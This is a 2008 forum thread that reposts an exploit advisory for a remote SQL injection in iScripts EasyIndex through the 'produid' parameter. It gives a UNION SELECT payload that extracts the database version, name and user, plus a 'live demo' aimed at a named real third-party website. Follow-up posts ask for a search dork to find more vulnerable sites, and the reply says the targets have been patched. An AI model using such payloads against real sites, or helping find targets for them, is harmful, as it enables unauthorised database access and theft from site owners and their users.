Thread subject: Explore Your Brain :: iScripts EasyIndex (produid) Remote SQL Injection Discovered By SirGod

Posted by EVA-00 on 17-09-2008 13:45
#1

##############################################################
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
##############################################################
[+] Remote SQL Injection


PoC :

http://[target]/[path]/detaillist.php?produid=[SQL]


Example :

http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all
select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


Live Demo :

http://www.dawsonvalley.net/business/detaillist.php?produid=-1
union all select
1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


- Note : the number of colums can vary.


##############################################################

# milw0rm.com [2008-09-16]

Edited by EVA-00 on 17-09-2008 13:46

Posted by squatter7 on 22-02-2009 14:21
#2

@kk ^

leh minta dork nya gag buat exploit di atas??

Posted by EVA-00 on 23-02-2009 03:10
#3

PErcuma, udah di patch abis-abisan bro, ngedork jg udah gak ada sisa. :victory: